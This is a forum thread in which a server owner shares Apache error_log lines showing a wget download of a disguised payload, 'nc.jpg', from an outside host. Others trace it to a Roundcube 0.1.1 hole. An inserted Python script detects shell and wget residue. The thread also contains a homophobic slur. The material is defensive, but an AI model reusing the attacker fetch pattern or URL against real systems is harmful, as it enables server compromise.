What's this in the httpd error_log?

lethal0r (Verified User, joined Jul 5, 2006, 31 messages)
Is this someone downloading something onto my server? How are they doing it?

Code:
sh: W: command not found
Can't open perl script "nc.jpg": No such file or directory
--10:26:54--  http://shnitzel.land.ru/nc.jpg
           => `nc.jpg'
Resolving shnitzel.land.ru... 82.204.219.223
Connecting to shnitzel.land.ru[82.204.219.223]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 895 [image/jpeg]

    0K                                                       100%    8.54 MB/s

10:26:54 (8.54 MB/s) - `nc.jpg' saved [895/895]
 
OK, so this gayer is somehow downloading that file to my server's tmp directory. It's not actually a JPG; it's got a rootkit inside.

How are they putting it into tmp? Is there a way I can find out?
 
There is probably a php script doing it. What version of Roundcube do you have?
 
It's 0.1.1.

Interesting you say that, because the previous lines in the error log are:

Code:
[Tue Mar 17 10:26:17 2009] [error] [client 88.2.201.88] File does not exist: /var/www/html/mail
[Tue Mar 17 10:26:17 2009] [warn] [client 88.2.201.88] mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed
[Tue Mar 17 10:26:17 2009] [error] [client 88.2.201.88] File does not exist: /var/www/html/roundcubemail
[Tue Mar 17 10:26:17 2009] [warn] [client 88.2.201.88] mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed

Do you think this is the script searching for these?

The directory it's installed in is called 'roundcube', so I guess that would be the next directory the script searched for, and it found it!

I have just deleted the directory - I don't use roundcubemail - will this be enough to protect the server from this attack?
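The pattern in the two log excerpts above (a client probing for webmail directories, then un-prefixed shell and wget output appearing in error_log because httpd spawned a process) can be picked out automatically. The following is an added example written for this thread, not code from any poster; the log sample is constructed from the lines quoted above with a placeholder download host, and the directory list and residue patterns are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample: Apache error_log lines from the thread plus one benign probe.
SAMPLE_LOG = """\
[Tue Mar 17 10:26:17 2009] [error] [client 88.2.201.88] File does not exist: /var/www/html/mail
[Tue Mar 17 10:26:17 2009] [warn] [client 88.2.201.88] mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed
[Tue Mar 17 10:26:17 2009] [error] [client 88.2.201.88] File does not exist: /var/www/html/roundcubemail
[Tue Mar 17 10:26:20 2009] [error] [client 10.0.0.5] File does not exist: /var/www/html/favicon.ico
sh: W: command not found
Can't open perl script "nc.jpg": No such file or directory
--10:26:54--  http://example.invalid/nc.jpg
10:26:54 (8.54 MB/s) - `nc.jpg' saved [895/895]
"""

# Standard Apache 2.2 error_log prefix: [timestamp] [level] [client ip] message
APACHE_LINE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[(?P<level>\w+)\] \[client (?P<ip>[\d.]+)\] (?P<msg>.*)$"
)
# Directory names a scanner tries when hunting for a webmail install (assumed list).
WEBMAIL_PROBES = ("mail", "roundcubemail", "roundcube", "webmail")
# httpd never writes these itself; they are stdout/stderr of a shell, perl or wget
# that the web server process spawned, so any match is worth an incident ticket.
SHELL_RESIDUE = (
    re.compile(r"^sh: .*command not found"),
    re.compile(r"^Can't open perl script"),
    re.compile(r"^--\d\d:\d\d:\d\d--\s+\S+://"),      # wget start line
    re.compile(r"saved \[\d+/\d+\]$"),                # wget completion line
)

def analyze(log_text):
    """Return ({client_ip: [probed webmail paths]}, [shell-residue lines])."""
    probes = defaultdict(list)
    residue = []
    for line in log_text.splitlines():
        m = APACHE_LINE.match(line)
        if m:
            msg = m.group("msg")
            if msg.startswith("File does not exist: "):
                path = msg[len("File does not exist: "):]
                if path.rstrip("/").rsplit("/", 1)[-1] in WEBMAIL_PROBES:
                    probes[m.group("ip")].append(path)
            continue  # well-formed httpd line, nothing spawned it
        if any(p.search(line) for p in SHELL_RESIDUE):
            residue.append(line)
    return dict(probes), residue
```

Any non-empty residue list means something ran commands as the httpd user; the probe map tells you which client to look for in access_log around the same timestamp.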
 
I've just read up on the Roundcube bug. Looks like I'm a lucky boy to still have my server.

So that's why I had about 50 sshd processes running last night :/

I must take this as a lesson and keep things up to date.
 